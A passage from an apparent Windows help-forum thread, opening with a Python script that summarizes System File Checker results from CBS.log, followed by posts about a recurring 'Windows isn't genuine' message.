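    """Same selection as: findstr /c:"[SR]" cbs.log"""
    return [line for line in log_text.splitlines() if SR_TAG in line]


def summarize_sfc(log_text):
    """Return the [SR] line count plus the files SFC repaired and could not repair."""
    unrepaired, repaired = set(), set()
    sr_lines = extract_sr_lines(log_text)
    for line in sr_lines:
        m = UNREPAIRED_RE.search(line)
        if m:
            unrepaired.add(m.group(1))
            continue
        m = REPAIRED_RE.search(line)
        if m:
            repaired.add(m.group(1))
    return {"sr_lines": len(sr_lines),
            "unrepaired": sorted(unrepaired),
            "repaired": sorted(repaired)}


if __name__ == "__main__":
    # Pass the path to CBS.log to analyze a real run; otherwise use the sample.
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="ignore") as fh:
            text = fh.read()
    else:
        text = SAMPLE_CBS_LOG
    result = summarize_sfc(text)
    print(f"{result['sr_lines']} [SR] lines")
    print("repaired:  ", ", ".join(result["repaired"]) or "none")
    print("unrepaired:", ", ".join(result["unrepaired"]) or "none")
```

The "unrepaired" list is the set of files worth looking at first when Windows Update or activation misbehaves after a failed SFC run.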

#13 phill!

phill!
  • Topic Starter

  • Members
  • 18 posts

Posted 15 October 2014 - 12:48 PM

sfcdetails.txt

Attached Files



#14 nasdaq

nasdaq

  • Malware Response Team
  • 39,903 posts
  • Gender:Male
  • Location:Montreal, QC. Canada

Posted 17 October 2014 - 01:30 PM

Sorry for this delay. I had technical problems.

I see nothing wrong in last log.

#15 phill!

phill!
  • Topic Starter

  • Members
  • 18 posts

Posted 20 October 2014 - 01:46 PM

No problem at all, I appreciate the help.  We're still getting the Windows isn't genuine message coming up daily even though Windows shows that it is activated.  I came here suspecting some sort of malware was the cause but maybe it's something wrong with Windows.  Any idea what else I could check?





